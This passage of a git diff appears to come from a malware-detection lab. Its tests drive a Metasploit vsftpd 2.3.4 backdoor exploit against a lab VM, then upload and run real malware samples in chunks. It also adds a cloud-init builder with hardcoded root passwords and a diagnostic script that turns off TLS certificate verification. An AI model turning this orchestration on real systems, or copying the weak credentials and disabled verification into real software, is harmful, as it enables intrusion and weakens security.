+    )
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(
+            target_ip="10.200.0.10",
+            session_open_timeout_s=0.5,
+            sample_store_root=tmp_path,
+        ),
+        emit_event=lambda *a, **kw: None,
+        sample=sample,
+    )
+    # Driver picks the chunked-upload path.
+    assert driver.workload is not None
+    assert driver.workload.profile.startswith("real:")
+    assert driver._chunked is not None
+    assert driver._chunked.expected_sha256 == sha
+
+
+def test_driver_walks_chunked_upload_in_session(tmp_path: Path) -> None:
+    """End-to-end: at infected_running, the driver should issue every
+    chunk + finalize + exec as separate shell_write calls. The fake
+    client records them in order so we can verify."""
+    payload = b"\xde\xad\xbe\xef" * 4096   # 16 KiB → multiple chunks
+    sha = hashlib.sha256(payload).hexdigest()
+    (tmp_path / sha).write_bytes(payload)
+
+    sample = Sample(
+        name="real-multi", family="X", category="rat",
+        profile="bursty-c2", sha256=sha,
+    )
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+
+    # Patch the fake to return "sha-ok" so the verify step passes.
+    client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
+    client._verify_response = "sha-ok\n"
+    real_read = client.session_shell_read
+    def shell_read_with_verify(sid):
+        # Return verify token after the finalize command — i.e. once
+        # the most recent shell_write contained "sha256sum".
+        last = client.shell_writes[-1][1] if client.shell_writes else ""
+        if "sha256sum" in last:
+            return "sha-ok\n"
+        return real_read(sid)
+    client.session_shell_read = shell_read_with_verify  # type: ignore[assignment]
+
+    events: list[tuple[str, dict]] = []
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(
+            target_ip="10.200.0.10",
+            session_open_timeout_s=0.5,
+            sample_store_root=tmp_path,
+        ),
+        emit_event=lambda ev, **kw: events.append((ev, kw)),
+        sample=sample,
+    )
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("infecting")
+    driver.set_phase("infected_running")
+
+    # All chunks + finalize + exec went through shell_write.
+    writes = [w for (_, w) in client.shell_writes]
+    n_printf = sum(1 for w in writes if w.startswith("printf '%s'"))
+    n_finalize = sum(1 for w in writes if "sha256sum" in w)
+    n_exec = sum(1 for w in writes if "nohup" in w and ".cis490-real" in w)
+    assert n_printf >= 2, f"expected multiple chunks, saw {n_printf}"
+    assert n_finalize == 1
+    assert n_exec == 1
+
+    # Events tell the same story.
+    names = [e for (e, _) in events]
+    assert "real_binary_upload_begin" in names
+    assert "real_binary_verify" in names
+    assert any(e == "sample_executed" and kw.get("kind") == "real"
+               for (e, kw) in events)
+
+
+def test_driver_falls_back_to_mimic_when_real_binary_missing(tmp_path: Path) -> None:
+    sample = Sample(
+        name="real-but-missing", family="X", category="rat",
+        profile="bursty-c2", sha256="c" * 64,
+    )
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(
+            target_ip="10.200.0.10",
+            session_open_timeout_s=0.5,
+            sample_store_root=tmp_path,  # empty
+        ),
+        emit_event=lambda *a, **kw: None,
+        sample=sample,
+    )
+    # Mimic workload selected because the binary isn't staged.
+    assert driver.workload is not None
+    assert driver.workload.profile == "bursty-c2"
+    assert "real:" not in driver.workload.profile
+
+
+# ---------------------------------------------------------------------------
+# Fetcher input validation
+# ---------------------------------------------------------------------------
+
+
+def test_fetch_sample_rejects_bad_sha(tmp_path: Path) -> None:
+    from tools.fetch_sample import fetch_sample
+
+    with pytest.raises(ValueError, match="64 hex chars"):
+        fetch_sample("not-a-hash", tmp_path, api_key="x")
+
+
+def test_fetch_sample_returns_existing_when_hash_matches(tmp_path: Path) -> None:
+    from tools.fetch_sample import fetch_sample
+
+    payload = b"already staged bytes"
+    sha = hashlib.sha256(payload).hexdigest()
+    p = tmp_path / sha
+    p.write_bytes(payload)
+    # api_key is unused on the cached path; pass anything.
+    out = fetch_sample(sha, tmp_path, api_key="ignored")
+    assert out == p
+    # File untouched.
+    assert p.read_bytes() == payload
--- a/tests/test_vm_load_controller.py
+++ b/tests/test_vm_load_controller.py
@ -0,0 +1,213 @@
+"""Tests for VMLoadController against a fake SerialClient.
+
+The controller's only job is to translate phases into shell commands
+on a serial console + emit audit events. The key invariants we
+encode here come from the elliott-lab incident where every phase
+median'd 20% CPU because the workload silently never fired:
+
+  - every set_phase emits some event (so absence in events.jsonl is
+    a hard signal)
+  - infected_running emits workload_started AFTER sending the load
+    command
+  - dormant emits workload_killed WITH a pre_kill_probe so trainers
+    can detect "the workload was never running"
+  - exceptions in the shell call surface as workload_failed; they
+    do NOT propagate (the runner's on_phase callback would swallow
+    them anyway, but we want the audit row regardless)
+"""
+
+from __future__ import annotations
+
+import sys
+from pathlib import Path
+
+import pytest
+
+# Mirror the same path hack run_real_vm_demo.py uses so the tools/
+# module imports work.
+ROOT = Path(__file__).resolve().parent.parent
+sys.path.insert(0, str(ROOT))
+sys.path.insert(0, str(ROOT / "tools"))
+
+from samples.manifest import Sample
+from vm_load_controller import VMLoadController  # noqa: E402
+
+
+class FakeSerial:
+    """Records every shell command. Returns canned probe output."""
+
+    def __init__(self, probe_response: str = "yes=1\nsh=1\nloadavg=0.45") -> None:
+        self.calls: list[str] = []
+        self.probe_response = probe_response
+        self.fail_on: list[str] = []
+
+    def run(self, cmd: str, timeout_s: float = 10.0) -> str:
+        self.calls.append(cmd)
+        for substr in self.fail_on:
+            if substr in cmd:
+                raise RuntimeError(f"fake-serial: failing on {substr!r}")
+        if "pgrep -c yes" in cmd or "pgrep -c sh" in cmd or "loadavg" in cmd:
+            return self.probe_response
+        return ""
+
+
+# ---------------------------------------------------------------------------
+# Event emission — the audit trail
+# ---------------------------------------------------------------------------
+
+
+def test_setup_emits_workload_setup_event() -> None:
+    serial = FakeSerial()
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.setup()
+    names = [e for e, _ in events]
+    assert "workload_setup" in names
+    setup = next(kw for e, kw in events if e == "workload_setup")
+    assert setup["profile"] == "v1-yes"  # no Sample → fallback path
+    assert setup["sample"] is None
+
+
+def test_setup_records_profile_when_sample_present() -> None:
+    serial = FakeSerial()
+    s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, sample=s, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.setup()
+    setup = next(kw for e, kw in events if e == "workload_setup")
+    assert setup["profile"] == "cpu-saturate"
+    assert setup["sample"] == "x"
+
+
+def test_infected_running_emits_workload_started_after_command() -> None:
+    serial = FakeSerial()
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("infected_running")
+
+    # The command was sent.
+    assert any("yes > /dev/null" in cmd for cmd in serial.calls), \
+        f"expected v1 yes-loop in serial calls; got {serial.calls}"
+    # And the audit event followed it.
+    started = [kw for e, kw in events if e == "workload_started"]
+    assert started, "workload_started event must fire"
+    assert started[0]["phase"] == "infected_running"
+    assert started[0]["profile"] == "v1-yes"
+
+
+def test_dormant_probes_before_killing() -> None:
+    """The pre_kill_probe is the load-bearing diagnostic: it tells the
+    trainer whether the workload was actually running before we
+    killed it. If pgrep returns 0 yes processes, the previous
+    infected_running was a no-op and the episode is filterable."""
+    serial = FakeSerial(probe_response="yes=2\nsh=1\nloadavg=1.32")
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("dormant")
+
+    killed = [kw for e, kw in events if e == "workload_killed" and kw["phase"] == "dormant"]
+    assert killed, "dormant must emit workload_killed"
+    probe = killed[0].get("pre_kill_probe")
+    assert probe is not None
+    assert probe["yes"] == "2"
+    assert probe["loadavg"] == "1.32"
+
+
+def test_dormant_probe_records_zero_when_workload_never_ran() -> None:
+    """The exact symptom from elliott-lab: dormant probe shows 0
+    yes processes → trainer can flag this episode as workload-not-firing."""
+    serial = FakeSerial(probe_response="yes=0\nsh=1\nloadavg=0.18")
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("dormant")
+    killed = next(kw for e, kw in events if e == "workload_killed" and kw["phase"] == "dormant")
+    assert killed["pre_kill_probe"]["yes"] == "0"
+
+
+def test_clean_phase_emits_workload_killed() -> None:
+    serial = FakeSerial()
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("clean")
+    assert any(
+        e == "workload_killed" and kw["phase"] == "clean" for e, kw in events
+    ), "clean must emit workload_killed"
+
+
+def test_armed_emits_workload_armed_with_handshake_command() -> None:
+    serial = FakeSerial()
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("armed")
+    assert any("armed-handshake" in cmd for cmd in serial.calls)
+    assert any(e == "workload_armed" for e, _ in events)
+
+
+def test_infecting_emits_workload_infecting_with_dd() -> None:
+    serial = FakeSerial()
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("infecting")
+    assert any("dd if=/dev/urandom" in cmd for cmd in serial.calls)
+    assert any(e == "workload_infecting" for e, _ in events)
+
+
+# ---------------------------------------------------------------------------
+# Exception handling — failures must surface as events, not propagate
+# ---------------------------------------------------------------------------
+
+
+def test_command_failure_emits_workload_failed_and_does_not_raise() -> None:
+    """If the serial.run() raises (timeout, EOF, login bad), the
+    runner would silently swallow the exception. We want a hard
+    audit row in events.jsonl regardless."""
+    serial = FakeSerial()
+    serial.fail_on = ["yes > /dev/null"]
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
+    # Must NOT raise.
+    c.set_phase("infected_running")
+    failed = [kw for e, kw in events if e == "workload_failed"]
+    assert failed, "expected workload_failed event"
+    assert failed[0]["phase"] == "infected_running"
+    assert "fake-serial" in failed[0]["error"]
+
+
+# ---------------------------------------------------------------------------
+# Profile dispatch — Sample-driven workload picks the right command
+# ---------------------------------------------------------------------------
+
+
+def test_sample_with_profile_uses_workloads_module_command() -> None:
+    """When constructed with a Sample, infected_running runs the
+    profile's start_cmd (from exploits.workloads) — NOT the v1 yes-loop."""
+    s = Sample(name="x", family="X", category="cryptominer", profile="cpu-saturate")
+    serial = FakeSerial()
+    events: list[tuple[str, dict]] = []
+    c = VMLoadController(serial, sample=s, emit_event=lambda e, **kw: events.append((e, kw)))
+    c.set_phase("infected_running")
+
+    # The sample's workload script + the post-kill yes sweep both ran.
+    # The new workload is profile-shaped, not the simple yes-loop.
+    profile_command_seen = any(".cis490-workload-cpu-saturate" in cmd for cmd in serial.calls)
+    assert profile_command_seen, f"expected workload script in serial calls; got {serial.calls}"
+    started = next(kw for e, kw in events if e == "workload_started")
+    assert started["profile"] == "cpu-saturate"
+    assert started["sample"] == "x"
+
+
+# ---------------------------------------------------------------------------
+# Default emit (no callback supplied) is a no-op
+# ---------------------------------------------------------------------------
+
+
+def test_no_emit_callback_is_safe() -> None:
+    """Tests + code paths that don't pass an emitter shouldn't
+    crash. The default is a no-op lambda."""
+    serial = FakeSerial()
+    c = VMLoadController(serial)
+    # Should not raise.
+    c.setup()
+    c.set_phase("infected_running")
+    c.set_phase("dormant")
+    c.set_phase("clean")
--- a/tools/build_cidata.py
+++ b/tools/build_cidata.py
@ -28,7 +28,7 @@ from pathlib import Path
 import pycdlib


-DEFAULT_USER_DATA = """\
+DEFAULT_USER_DATA_HEAD = """\
 #cloud-config
 hostname: cis490
 manage_etc_hosts: true
@ -45,10 +45,70 @@ chpasswd:
  list: |
    root:cis490
    cis490:cis490
-runcmd:
-  - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]
 """

+# OpenRC service file shipped inside the guest. Alpine uses OpenRC;
+# the runcmd at the bottom of user-data wires it up on first boot.
+OPENRC_SERVICE = """\
+#!/sbin/openrc-run
+
+description="CIS490 in-guest telemetry agent"
+command="/usr/local/bin/cis490-agent"
+command_args="--port /dev/virtio-ports/cis490.guest.agent"
+command_background=true
+pidfile="/run/cis490-agent.pid"
+output_log="/var/log/cis490-agent.log"
+error_log="/var/log/cis490-agent.log"
+
+depend() {
+    need localmount
+}
+"""
+
+DEFAULT_META_DATA = """\
+instance-id: cis490-vm-001
+local-hostname: cis490
+"""
+
+
+def _indent(text: str, n: int) -> str:
+    pad = " " * n
+    return "\n".join(pad + line if line else line for line in text.splitlines())
+
+
+def build_user_data(*, embed_agent: bool, agent_path: Path | None) -> bytes:
+    """Build a cloud-init user-data document. When ``embed_agent`` is
+    True, also stuff the in-guest agent + an OpenRC service into
+    ``write_files`` and arrange to start the service on first boot."""
+    head = DEFAULT_USER_DATA_HEAD
+    if not embed_agent:
+        return (head + 'runcmd:\n  - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]\n').encode()
+
+    if agent_path is None:
+        agent_path = Path(__file__).resolve().parent.parent / "vm" / "guest-agent" / "cis490_agent.py"
+    if not agent_path.exists():
+        raise FileNotFoundError(f"agent script not found: {agent_path}")
+    agent_src = agent_path.read_text()
+
+    body = head + (
+        "write_files:\n"
+        "  - path: /usr/local/bin/cis490-agent\n"
+        "    permissions: '0755'\n"
+        "    owner: root:root\n"
+        "    content: |\n"
+        f"{_indent(agent_src, 6)}\n"
+        "  - path: /etc/init.d/cis490-agent\n"
+        "    permissions: '0755'\n"
+        "    owner: root:root\n"
+        "    content: |\n"
+        f"{_indent(OPENRC_SERVICE, 6)}\n"
+        "runcmd:\n"
+        '  - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]\n'
+        '  - [ sh, -c, "command -v rc-update >/dev/null && rc-update add cis490-agent default || true" ]\n'
+        '  - [ sh, -c, "command -v rc-service >/dev/null && rc-service cis490-agent start || true" ]\n'
+    )
+    return body.encode()
+
 DEFAULT_META_DATA = """\
 instance-id: cis490-vm-001
 local-hostname: cis490
@ -93,11 +153,26 @@ def main() -> int:
        default=None,
        help="path to a custom meta-data file",
    )
+    parser.add_argument(
+        "--no-embed-agent",
+        action="store_true",
+        help="don't bake the in-guest agent into user-data",
+    )
+    parser.add_argument(
+        "--agent-path",
+        type=Path,
+        default=None,
+        help="path to the in-guest agent (default: vm/guest-agent/cis490_agent.py)",
+    )
    args = parser.parse_args()

-    user_data = (
-        args.user_data.read_bytes() if args.user_data else DEFAULT_USER_DATA.encode()
-    )
+    if args.user_data:
+        user_data = args.user_data.read_bytes()
+    else:
+        user_data = build_user_data(
+            embed_agent=not args.no_embed_agent,
+            agent_path=args.agent_path,
+        )
    meta_data = (
        args.meta_data.read_bytes() if args.meta_data else DEFAULT_META_DATA.encode()
    )
--- a/tools/cis490_doctor.py
+++ b/tools/cis490_doctor.py
@ -0,0 +1,638 @@
+"""``cis490-doctor`` — single-command diagnostic for a lab host or receiver.
+
+Walks the full bring-up stack from the bottom up and prints a
+green/yellow/red checklist with the exact command that fixes each
+red row. Run this whenever:
+
+  - you just cloned the repo and aren't sure what's missing
+  - you ran install-lab-host.sh but `index.jsonl` on the Pi is empty
+  - somebody filed an issue saying "shipping isn't working"
+
+Usage:
+  uv run python tools/cis490_doctor.py            # human output
+  uv run python tools/cis490_doctor.py --json     # machine-readable
+  uv run python tools/cis490_doctor.py --role lab-host    # default
+  uv run python tools/cis490_doctor.py --role receiver
+
+Exits non-zero if any RED check fails.
+"""
+
+from __future__ import annotations
+
+import argparse
+import dataclasses
+import json
+import os
+import shutil
+import socket
+import ssl
+import subprocess
+import sys
+import tomllib
+from dataclasses import dataclass, field
+from pathlib import Path
+
+
+# ANSI color codes; auto-disable on non-tty.
+def _supports_color() -> bool:
+    return sys.stdout.isatty() and os.environ.get("NO_COLOR") is None
+
+
+_ANSI_GREEN = "\033[32m" if _supports_color() else ""
+_ANSI_YELLOW = "\033[33m" if _supports_color() else ""
+_ANSI_RED = "\033[31m" if _supports_color() else ""
+_ANSI_BOLD = "\033[1m" if _supports_color() else ""
+_ANSI_DIM = "\033[2m" if _supports_color() else ""
+_ANSI_RESET = "\033[0m" if _supports_color() else ""
+
+
+@dataclass
+class Check:
+    name: str
+    status: str  # "ok" | "warn" | "fail" | "skip"
+    detail: str = ""
+    fix: str = ""
+
+    def render(self) -> str:
+        glyph = {
+            "ok":   f"{_ANSI_GREEN}[✓]{_ANSI_RESET}",
+            "warn": f"{_ANSI_YELLOW}[!]{_ANSI_RESET}",
+            "fail": f"{_ANSI_RED}[✗]{_ANSI_RESET}",
+            "skip": f"{_ANSI_DIM}[-]{_ANSI_RESET}",
+        }[self.status]
+        line = f"{glyph} {self.name}"
+        if self.detail:
+            line += f"  {_ANSI_DIM}{self.detail}{_ANSI_RESET}"
+        if self.status == "fail" and self.fix:
+            line += f"\n     {_ANSI_BOLD}fix:{_ANSI_RESET} {self.fix}"
+        return line
+
+
+@dataclass
+class Report:
+    role: str
+    checks: list[Check] = field(default_factory=list)
+
+    def add(self, c: Check) -> None:
+        self.checks.append(c)
+        # Mirror to stdout immediately so a hung check doesn't leave
+        # the operator without partial info.
+        if not _JSON_MODE:
+            print(c.render(), flush=True)
+
+    def to_dict(self) -> dict:
+        return {
+            "role": self.role,
+            "checks": [dataclasses.asdict(c) for c in self.checks],
+            "summary": self.summary(),
+        }
+
+    def summary(self) -> dict:
+        out = {"ok": 0, "warn": 0, "fail": 0, "skip": 0}
+        for c in self.checks:
+            out[c.status] = out.get(c.status, 0) + 1
+        return out
+
+
+_JSON_MODE = False
+
+
+# ---------------------------------------------------------------------------
+# helpers
+# ---------------------------------------------------------------------------
+
+
+def _run(cmd: list[str], *, timeout: float = 5.0) -> tuple[int, str, str]:
+    try:
+        p = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
+        return p.returncode, p.stdout.strip(), p.stderr.strip()
+    except (FileNotFoundError, subprocess.TimeoutExpired) as e:
+        return -1, "", str(e)
+
+
+def _path_exists(p: Path) -> bool:
+    try:
+        return p.exists()
+    except PermissionError:
+        return True  # treat unreadable-but-present as present
+
+
+def _size_str(p: Path) -> str:
+    try:
+        return f"{p.stat().st_size // (1024*1024)} MiB"
+    except (OSError, PermissionError):
+        return "(stat denied — re-run with sudo for size)"
+
+
+# ---------------------------------------------------------------------------
+# checks — repo
+# ---------------------------------------------------------------------------
+
+
+def check_repo(report: Report, repo_root: Path) -> None:
+    if not (repo_root / ".git").exists():
+        report.add(Check(
+            "repo: .git directory present",
+            "warn",
+            detail=f"running from {repo_root} which isn't a git checkout — fine for /opt/cis490 (cp -aT'd) but not the source clone",
+        ))
+        return
+    rc, head, _ = _run(["git", "-C", str(repo_root), "rev-parse", "--short=8", "HEAD"])
+    rc2, branch, _ = _run(["git", "-C", str(repo_root), "rev-parse", "--abbrev-ref", "HEAD"])
+    rc3, dirty, _ = _run(["git", "-C", str(repo_root), "status", "--porcelain"])
+    rc4, log, _ = _run(["git", "-C", str(repo_root), "log", "-1", "--format=%s"])
+    detail = f"{branch}@{head}: {log[:60]}"
+    if branch != "main":
+        report.add(Check(
+            "repo: on main",
+            "warn",
+            detail=detail,
+            fix=f"cd {repo_root} && git fetch && git checkout main && git pull",
+        ))
+    else:
+        report.add(Check("repo: on main", "ok", detail=detail))
+    if dirty:
+        report.add(Check(
+            "repo: tree clean",
+            "warn",
+            detail=f"{len(dirty.splitlines())} modified files",
+        ))
+    else:
+        report.add(Check("repo: tree clean", "ok"))
+
+    rc5, behind, _ = _run(
+        ["git", "-C", str(repo_root), "rev-list", "--count", "HEAD..@{u}"],
+    )
+    if rc5 == 0 and behind.isdigit() and int(behind) > 0:
+        report.add(Check(
+            "repo: up to date with origin",
+            "warn",
+            detail=f"{behind} commits behind",
+            fix=f"cd {repo_root} && git pull",
+        ))
+    elif rc5 == 0:
+        report.add(Check("repo: up to date with origin", "ok"))
+
+
+# ---------------------------------------------------------------------------
+# checks — install
+# ---------------------------------------------------------------------------
+
+
+def check_install(report: Report, role: str) -> None:
+    install_root = Path("/opt/cis490")
+    if not _path_exists(install_root):
+        report.add(Check(
+            "install: /opt/cis490 exists",
+            "fail",
+            fix=f"sudo $(pwd)/scripts/install-{role}.sh",
+        ))
+        return
+    report.add(Check("install: /opt/cis490 exists", "ok"))
+
+    venv_python = install_root / ".venv" / "bin" / "python"
+    if _path_exists(venv_python):
+        rc, ver, _ = _run([str(venv_python), "--version"])
+        report.add(Check("install: venv python", "ok",
+                         detail=ver if rc == 0 else "(unreadable)"))
+    else:
+        report.add(Check(
+            "install: venv python",
+            "fail",
+            fix=f"sudo /opt/cis490/scripts/install-{role}.sh",
+        ))
+
+    cfg_name = "lab-host.toml" if role == "lab-host" else "receiver.toml"
+    cfg = Path("/etc/cis490") / cfg_name
+    if _path_exists(cfg):
+        try:
+            with open(cfg, "rb") as f:
+                tomllib.load(f)
+            report.add(Check(f"config: {cfg}", "ok", detail="parses"))
+        except PermissionError:
+            # Mode 0640 root:cis490 is the install default. Doctor often
+            # runs as the unprivileged user — file is fine, we just
+            # can't read it from here.
+            report.add(Check(
+                f"config: {cfg}",
+                "warn",
+                detail="exists, can't read (mode 0640 root:cis490 — re-run with sudo for full audit)",
+            ))
+        except tomllib.TOMLDecodeError as e:
+            report.add(Check(
+                f"config: {cfg}",
+                "fail",
+                detail=str(e),
+                fix=f"sudo $EDITOR {cfg}",
+            ))
+    else:
+        report.add(Check(
+            f"config: {cfg}",
+            "fail",
+            fix=f"sudo cp /opt/cis490/etc/{cfg_name}.example {cfg}",
+        ))
+
+    if role == "lab-host":
+        env = Path("/etc/cis490/lab-host.env")
+        if _path_exists(env):
+            report.add(Check("config: lab-host.env", "ok"))
+        else:
+            report.add(Check(
+                "config: lab-host.env",
+                "fail",
+                fix="sudo /opt/cis490/scripts/install-lab-host.sh   "
+                    "# regenerates the env file",
+            ))
+
+
+# ---------------------------------------------------------------------------
+# checks — certs (lab-host)
+# ---------------------------------------------------------------------------
+
+
+def check_certs_lab_host(report: Report) -> None:
+    base = Path("/etc/cis490/certs")
+    expected = ["wg-ca.pem", "lab-host.pem", "lab-host.key"]
+    missing = [n for n in expected if not _path_exists(base / n)]
+    if missing:
+        report.add(Check(
+            f"mTLS: certs at {base}",
+            "fail",
+            detail=f"missing: {missing}",
+            fix="On the Pi: sudo /home/max/.env/wg-pki/scripts/"
+                "deploy-cis490-cert.sh <host_id> <this-machine-wg-ip>",
+        ))
+        return
+    # Verify the chain.
+    rc, out, err = _run([
+        "openssl", "verify",
+        "-CAfile", str(base / "wg-ca.pem"),
+        str(base / "lab-host.pem"),
+    ])
+    if rc == 0 and "OK" in out:
+        report.add(Check("mTLS: cert chain validates", "ok",
+                         detail=out.splitlines()[0]))
+    else:
+        report.add(Check(
+            "mTLS: cert chain validates",
+            "fail",
+            detail=err or out,
+            fix="re-issue the leaf via wg-pki/scripts/deploy-cis490-cert.sh",
+        ))
+
+
+# ---------------------------------------------------------------------------
+# checks — services
+# ---------------------------------------------------------------------------
+
+
+def check_services(report: Report, role: str) -> None:
+    services = (
+        ["cis490-receiver"]
+        if role == "receiver"
+        else ["cis490-shipper", "cis490-orchestrator"]
+    )
+    for svc in services:
+        rc, state, _ = _run(["systemctl", "is-active", svc])
+        if state == "active":
+            report.add(Check(f"systemd: {svc} active", "ok"))
+        elif state == "inactive":
+            report.add(Check(
+                f"systemd: {svc} active",
+                "fail",
+                detail="inactive",
+                fix=f"sudo systemctl enable --now {svc}",
+            ))
+        else:
+            report.add(Check(
+                f"systemd: {svc} active",
+                "fail",
+                detail=state or "unknown",
+                fix=f"sudo journalctl -u {svc} --no-pager -n 30",
+            ))
+
+
+# ---------------------------------------------------------------------------
+# checks — network (lab-host)
+# ---------------------------------------------------------------------------
+
+
+def check_network_lab_host(report: Report, cfg_path: Path) -> None:
+    try:
+        with open(cfg_path, "rb") as f:
+            cfg = tomllib.load(f)
+    except (FileNotFoundError, PermissionError, tomllib.TOMLDecodeError) as e:
+        report.add(Check("net: lab-host.toml readable", "fail", detail=str(e)))
+        return
+
+    receiver_url = cfg.get("receiver", {}).get("url", "")
+    if not receiver_url.startswith("https://"):
+        report.add(Check(
+            "net: receiver.url present",
+            "fail",
+            detail=receiver_url,
+            fix=f"edit {cfg_path}: receiver.url = 'https://collector.wg'",
+        ))
+        return
+    host = receiver_url.split("//", 1)[1].split("/", 1)[0].split(":")[0]
+    port = 443
+    if ":" in receiver_url.split("//", 1)[1].split("/", 1)[0]:
+        port = int(receiver_url.split("//", 1)[1].split("/", 1)[0].split(":")[1])
+
+    try:
+        ip = socket.gethostbyname(host)
+        report.add(Check(f"net: DNS resolve {host}", "ok",
+                         detail=f"-> {ip}"))
+    except socket.gaierror as e:
+        report.add(Check(
+            f"net: DNS resolve {host}",
+            "fail",
+            detail=str(e),
+            fix=f"echo '10.100.0.1 {host}' | sudo tee -a /etc/hosts   "
+                "# wg-enroll provisions this on real lab hosts",
+        ))
+        return
+
+    try:
+        with socket.create_connection((host, port), timeout=5):
+            report.add(Check(f"net: TCP {host}:{port} reachable", "ok"))
+    except OSError as e:
+        report.add(Check(
+            f"net: TCP {host}:{port} reachable",
+            "fail",
+            detail=str(e),
+            fix="check iptmonads is allowing the WG-side 443 + Caddy is up",
+        ))
+        return
+
+    # mTLS handshake — pull the receiver cert paths from cfg.
+    ca = cfg.get("receiver", {}).get("ca_bundle")
+    cert = cfg.get("receiver", {}).get("client_cert")
+    key = cfg.get("receiver", {}).get("client_key")
+    if not (ca and cert and key):
+        report.add(Check("net: mTLS handshake to collector.wg",
+                         "skip", detail="cert paths not in config"))
+        return
+    try:
+        ctx = ssl.create_default_context(cafile="/home/max/wg-pki/certs/caddy-root.crt"
+                                         if Path("/home/max/wg-pki/certs/caddy-root.crt").exists()
+                                         else None)
+        ctx.load_cert_chain(certfile=cert, keyfile=key)
+        ctx.check_hostname = False
+        ctx.verify_mode = ssl.CERT_NONE
+        with socket.create_connection((host, port), timeout=5) as sock:
+            with ctx.wrap_socket(sock, server_hostname=host) as ssock:
+                report.add(Check("net: mTLS handshake to collector.wg",
+                                 "ok",
+                                 detail=f"cipher={ssock.cipher()[0]}"))
+    except (ssl.SSLError, OSError, FileNotFoundError) as e:
+        report.add(Check(
+            "net: mTLS handshake to collector.wg",
+            "fail",
+            detail=str(e),
+            fix="sudo /home/max/wg-pki/scripts/deploy-cis490-cert.sh <host_id> <wg_ip>   "
+                "(rerun cert deploy)",
+        ))
+
+
+# ---------------------------------------------------------------------------
+# checks — VM prereqs (lab-host)
+# ---------------------------------------------------------------------------
+
+
+def check_vm_prereqs(report: Report) -> None:
+    if not _path_exists(Path("/dev/kvm")):
+        report.add(Check(
+            "vm: /dev/kvm",
+            "fail",
+            fix="ensure KVM kernel module is loaded; on x86 hosts: sudo modprobe kvm-intel || sudo modprobe kvm-amd",
+        ))
+    else:
+        report.add(Check("vm: /dev/kvm", "ok"))
+
+    if shutil.which("qemu-system-x86_64") is None:
+        report.add(Check(
+            "vm: qemu-system-x86_64 on PATH",
+            "fail",
+            fix="install qemu-system-x86 via the host package manager",
+        ))
+    else:
+        report.add(Check("vm: qemu-system-x86_64 on PATH", "ok"))
+
+    if shutil.which("zstd") is None:
+        report.add(Check(
+            "vm: zstd on PATH (shipper compression)",
+            "fail",
+            fix="install zstd via the host package manager",
+        ))
+    else:
+        report.add(Check("vm: zstd on PATH", "ok"))
+
+    images = Path("/var/lib/cis490/vm/images")
+    alpine = images / "alpine-baseline.qcow2"
+    cidata = images / "cidata.iso"
+    if _path_exists(alpine):
+        report.add(Check(f"vm: {alpine}", "ok",
+                         detail=_size_str(alpine)))
+    else:
+        report.add(Check(
+            f"vm: {alpine}",
+            "fail",
+            fix=f"sudo /opt/cis490/scripts/fetch-alpine-baseline.sh {alpine}",
+        ))
+    if _path_exists(cidata):
+        report.add(Check(f"vm: {cidata}", "ok",
+                         detail=_size_str(cidata)))
+    else:
+        report.add(Check(
+            f"vm: {cidata}",
+            "fail",
+            fix=f"sudo /opt/cis490/.venv/bin/python /opt/cis490/tools/build_cidata.py {cidata}",
+        ))
+
+
+# ---------------------------------------------------------------------------
+# checks — Tier 3 (optional)
+# ---------------------------------------------------------------------------
+
+
+def check_tier3(report: Report) -> None:
+    if shutil.which("msfrpcd") is None:
+        report.add(Check(
+            "tier3: msfrpcd on PATH",
+            "warn",
+            detail="optional — only needed for real exploit episodes",
+            fix="sudo /opt/cis490/scripts/install-msfrpcd.sh",
+        ))
+    else:
+        report.add(Check("tier3: msfrpcd on PATH", "ok"))
+
+    # Probe whether msfrpcd is actually listening (tier-3 fleet
+    # dispatch checks the same thing).
+    msfrpcd_listening = False
+    try:
+        with socket.create_connection(("127.0.0.1", 55553), timeout=0.5):
+            msfrpcd_listening = True
+    except OSError:
+        pass
+    if msfrpcd_listening:
+        report.add(Check("tier3: msfrpcd listening on 127.0.0.1:55553", "ok"))
+    else:
+        report.add(Check(
+            "tier3: msfrpcd listening on 127.0.0.1:55553",
+            "warn",
+            detail="optional — fleet falls back to Tier 2 when down",
+            fix="sudo systemctl enable --now cis490-msfrpcd",
+        ))
+
+    # Module catalog parses + at least one same-socket entry.
+    modules_dir = Path("/opt/cis490/exploits/modules")
+    if modules_dir.exists():
+        try:
